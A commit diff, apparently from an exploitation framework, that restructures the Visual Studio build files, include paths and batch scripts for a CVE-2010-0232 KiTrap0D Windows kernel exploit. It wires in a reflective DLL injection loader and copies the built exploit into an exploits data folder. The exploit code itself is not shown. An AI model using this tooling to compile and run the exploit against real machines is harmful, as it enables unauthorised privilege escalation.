-   LPVOID lpEntryInProgress;
136
-} PEB_LDR_DATA, * PPEB_LDR_DATA;
137
-
138
-// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
139
-typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
140
-{
141
-   struct _PEB_FREE_BLOCK * pNext;
142
-   DWORD dwSize;
143
-} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
144
-
145
-// struct _PEB is defined in Winternl.h but it is incomplete
146
-// WinDbg> dt -v ntdll!_PEB
147
-typedef struct __PEB // 65 elements, 0x210 bytes
148
-{
149
-   BYTE bInheritedAddressSpace;
150
-   BYTE bReadImageFileExecOptions;
151
-   BYTE bBeingDebugged;
152
-   BYTE bSpareBool;
153
-   LPVOID lpMutant;
154
-   LPVOID lpImageBaseAddress;
155
-   PPEB_LDR_DATA pLdr;
156
-   LPVOID lpProcessParameters;
157
-   LPVOID lpSubSystemData;
158
-   LPVOID lpProcessHeap;
159
-   PRTL_CRITICAL_SECTION pFastPebLock;
160
-   LPVOID lpFastPebLockRoutine;
161
-   LPVOID lpFastPebUnlockRoutine;
162
-   DWORD dwEnvironmentUpdateCount;
163
-   LPVOID lpKernelCallbackTable;
164
-   DWORD dwSystemReserved;
165
-   DWORD dwAtlThunkSListPtr32;
166
-   PPEB_FREE_BLOCK pFreeList;
167
-   DWORD dwTlsExpansionCounter;
168
-   LPVOID lpTlsBitmap;
169
-   DWORD dwTlsBitmapBits[2];
170
-   LPVOID lpReadOnlySharedMemoryBase;
171
-   LPVOID lpReadOnlySharedMemoryHeap;
172
-   LPVOID lpReadOnlyStaticServerData;
173
-   LPVOID lpAnsiCodePageData;
174
-   LPVOID lpOemCodePageData;
175
-   LPVOID lpUnicodeCaseTableData;
176
-   DWORD dwNumberOfProcessors;
177
-   DWORD dwNtGlobalFlag;
178
-   LARGE_INTEGER liCriticalSectionTimeout;
179
-   DWORD dwHeapSegmentReserve;
180
-   DWORD dwHeapSegmentCommit;
181
-   DWORD dwHeapDeCommitTotalFreeThreshold;
182
-   DWORD dwHeapDeCommitFreeBlockThreshold;
183
-   DWORD dwNumberOfHeaps;
184
-   DWORD dwMaximumNumberOfHeaps;
185
-   LPVOID lpProcessHeaps;
186
-   LPVOID lpGdiSharedHandleTable;
187
-   LPVOID lpProcessStarterHelper;
188
-   DWORD dwGdiDCAttributeList;
189
-   LPVOID lpLoaderLock;
190
-   DWORD dwOSMajorVersion;
191
-   DWORD dwOSMinorVersion;
192
-   WORD wOSBuildNumber;
193
-   WORD wOSCSDVersion;
194
-   DWORD dwOSPlatformId;
195
-   DWORD dwImageSubsystem;
196
-   DWORD dwImageSubsystemMajorVersion;
197
-   DWORD dwImageSubsystemMinorVersion;
198
-   DWORD dwImageProcessAffinityMask;
199
-   DWORD dwGdiHandleBuffer[34];
200
-   LPVOID lpPostProcessInitRoutine;
201
-   LPVOID lpTlsExpansionBitmap;
202
-   DWORD dwTlsExpansionBitmapBits[32];
203
-   DWORD dwSessionId;
204
-   ULARGE_INTEGER liAppCompatFlags;
205
-   ULARGE_INTEGER liAppCompatFlagsUser;
206
-   LPVOID lppShimData;
207
-   LPVOID lpAppCompatInfo;
208
-   UNICODE_STR usCSDVersion;
209
-   LPVOID lpActivationContextData;
210
-   LPVOID lpProcessAssemblyStorageMap;
211
-   LPVOID lpSystemDefaultActivationContextData;
212
-   LPVOID lpSystemAssemblyStorageMap;
213
-   DWORD dwMinimumStackCommit;
214
-} _PEB, * _PPEB;
215
-
216
-typedef struct
217
-{
218
-	WORD	offset:12;
219
-	WORD	type:4;
220
-} IMAGE_RELOC, *PIMAGE_RELOC;
221
-//===============================================================================================//
222
-#endif
223
-//===============================================================================================//

+ 2
- 2
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.c View File

@@ -10,11 +10,11 @@
10 10
  */
11 11
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
12 12
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
13
-#include "../common/ReflectiveLoader.c"
13
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
14 14
 
15 15
 #include <stdio.h>
16 16
 #include "../common/common.h"
17
-#include "../common/LoadLibraryR.h"
17
+#include "../../../ReflectiveDLLInjection/inject/src/LoadLibraryR.h"
18 18
 #include "../common/ResourceLoader.h"
19 19
 #include "resource.h"
20 20
 

+ 9
- 5
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj View File

@@ -49,7 +49,7 @@
49 49
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
50 50
     <ClCompile>
51 51
       <Optimization>Disabled</Optimization>
52
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
52
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
53 53
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
54 54
       <MinimalRebuild>true</MinimalRebuild>
55 55
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -81,7 +81,7 @@
81 81
       <Optimization>MinSpace</Optimization>
82 82
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
83 83
       <IntrinsicFunctions>false</IntrinsicFunctions>
84
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
84
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
85 85
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
86 86
       <StringPooling>true</StringPooling>
87 87
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@@ -121,17 +121,21 @@
121 121
       <AdditionalOptions>/ignore:4070</AdditionalOptions>
122 122
     </Link>
123 123
     <PostBuildEvent>
124
-      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
124
+      <Command>editbin.exe /NOLOGO /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL
125
+IF EXIST "..\..\..\..\..\data\exploits\CVE-2010-0232\" GOTO COPY
126
+    mkdir "..\..\..\..\..\data\exploits\CVE-2010-0232\"
127
+:COPY
128
+copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\..\data\exploits\CVE-2010-0232\"</Command>
125 129
     </PostBuildEvent>
126 130
   </ItemDefinitionGroup>
127 131
   <ItemGroup>
128
-    <ClCompile Include="..\common\LoadLibraryR.c" />
132
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
129 133
     <ClCompile Include="..\common\ResourceLoader.c" />
130 134
     <ClCompile Include="kitrap0d.c" />
131 135
   </ItemGroup>
132 136
   <ItemGroup>
137
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h" />
133 138
     <ClInclude Include="..\common\common.h" />
134
-    <ClInclude Include="..\common\LoadLibraryR.h" />
135 139
     <ClInclude Include="..\common\ResourceLoader.h" />
136 140
     <ClInclude Include="resource.h" />
137 141
   </ItemGroup>

+ 9
- 6
external/source/exploits/CVE-2010-0232/kitrap0d/kitrap0d.vcxproj.filters View File

@@ -2,24 +2,24 @@
2 2
 <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 3
   <ItemGroup>
4 4
     <ClCompile Include="kitrap0d.c" />
5
-    <ClCompile Include="..\common\LoadLibraryR.c">
6
-      <Filter>common</Filter>
7
-    </ClCompile>
8 5
     <ClCompile Include="..\common\ResourceLoader.c">
9 6
       <Filter>common</Filter>
10 7
     </ClCompile>
8
+    <ClCompile Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
9
+      <Filter>RDI</Filter>
10
+    </ClCompile>
11 11
   </ItemGroup>
12 12
   <ItemGroup>
13 13
     <ClInclude Include="resource.h" />
14 14
     <ClInclude Include="..\common\common.h">
15 15
       <Filter>common</Filter>
16 16
     </ClInclude>
17
-    <ClInclude Include="..\common\LoadLibraryR.h">
18
-      <Filter>common</Filter>
19
-    </ClInclude>
20 17
     <ClInclude Include="..\common\ResourceLoader.h">
21 18
       <Filter>common</Filter>
22 19
     </ClInclude>
20
+    <ClInclude Include="..\..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.h">
21
+      <Filter>RDI</Filter>
22
+    </ClInclude>
23 23
   </ItemGroup>
24 24
   <ItemGroup>
25 25
     <ResourceCompile Include="kitrap0d.rc" />
@@ -28,5 +28,8 @@
28 28
     <Filter Include="common">
29 29
       <UniqueIdentifier>{cbb362dd-4029-4348-86d3-62c4b22c742d}</UniqueIdentifier>
30 30
     </Filter>
31
+    <Filter Include="RDI">
32
+      <UniqueIdentifier>{662e77af-b8cd-4717-a3f2-87b2ec57f46c}</UniqueIdentifier>
33
+    </Filter>
31 34
   </ItemGroup>
32 35
 </Project>

+ 2
- 2
external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj View File

@@ -49,7 +49,7 @@
49 49
   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
50 50
     <ClCompile>
51 51
       <Optimization>Disabled</Optimization>
52
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
52
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
53 53
       <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
54 54
       <MinimalRebuild>true</MinimalRebuild>
55 55
       <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
@@ -75,7 +75,7 @@
75 75
       <Optimization>MinSpace</Optimization>
76 76
       <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
77 77
       <IntrinsicFunctions>false</IntrinsicFunctions>
78
-      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
78
+      <AdditionalIncludeDirectories>..\..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
79 79
       <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
80 80
       <StringPooling>true</StringPooling>
81 81
       <RuntimeLibrary>MultiThreaded</RuntimeLibrary>

+ 1
- 1
external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c View File

@@ -7,7 +7,7 @@
7 7
 
8 8
 #define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
9 9
 #define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
10
-#include "../common/ReflectiveLoader.c"
10
+#include "../../../ReflectiveDLLInjection/dll/src/ReflectiveLoader.c"
11 11
 
12 12
 #include <stdlib.h>
13 13
 #include "kitrap0d.h"

+ 18
- 0
external/source/exploits/CVE-2010-0232/make.msbuild View File

@@ -0,0 +1,18 @@
1
+<?xml version="1.0" standalone="yes"?>
2
+<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3
+  <PropertyGroup>
4
+    <SolutionPath>.\kitrap0d.sln</SolutionPath>
5
+  </PropertyGroup>
6
+
7
+  <Target Name="all" DependsOnTargets="x86" />
8
+
9
+  <Target Name="x86">
10
+    <Message Text="Building CVE-2010-0232 KiTrap0D x86 Release version" />
11
+    <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/>
12
+  </Target>
13
+
14
+  <Target Name="x64">
15
+    <Message Text="KiTrap0D is not supported in x64" />
16
+  </Target>
17
+</Project>
18
+

+ 39
- 0
external/source/exploits/make.bat View File

@@ -0,0 +1,39 @@
1
+@ECHO OFF
2
+IF "%VCINSTALLDIR%" == "" GOTO NEED_VS
3
+
4
+IF "%1"=="x86" GOTO BUILD_X86
5
+IF "%1"=="X86" GOTO BUILD_X86
6
+IF "%1"=="x64" GOTO BUILD_X64
7
+IF "%1"=="X64" GOTO BUILD_X64
8
+
9
+ECHO "Building Exploits x64 and x86 (Release)"
10
+SET PLAT=all
11
+GOTO RUN
12
+
13
+:BUILD_X86
14
+ECHO "Building Exploits x86 (Release)"
15
+SET PLAT=x86
16
+GOTO RUN
17
+
18
+:BUILD_X64
19
+ECHO "Building Exploits x64 (Release)"
20
+SET PLAT=x64
21
+GOTO RUN
22
+
23
+:RUN
24
+ECHO "Building CVE-2010-0232 (KiTrap0D)"
25
+PUSHD CVE-2010-0232
26
+msbuild.exe make.msbuild /target:%PLAT%
27
+POPD
28
+
29
+FOR /F "usebackq tokens=1,2 delims==" %%i IN (`wmic os get LocalDateTime /VALUE 2^>NUL`) DO IF '.%%i.'=='.LocalDateTime.' SET LDT=%%j
30
+SET LDT=%LDT:~0,4%-%LDT:~4,2%-%LDT:~6,2% %LDT:~8,2%:%LDT:~10,2%:%LDT:~12,6%
31
+echo Finished %ldt%
32
+
33
+GOTO :END
34
+
35
+:NEED_VS
36
+ECHO "This command must be executed from within a Visual Studio Command prompt."
37
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
38
+
39
+:END

Loading…
Cancel
Save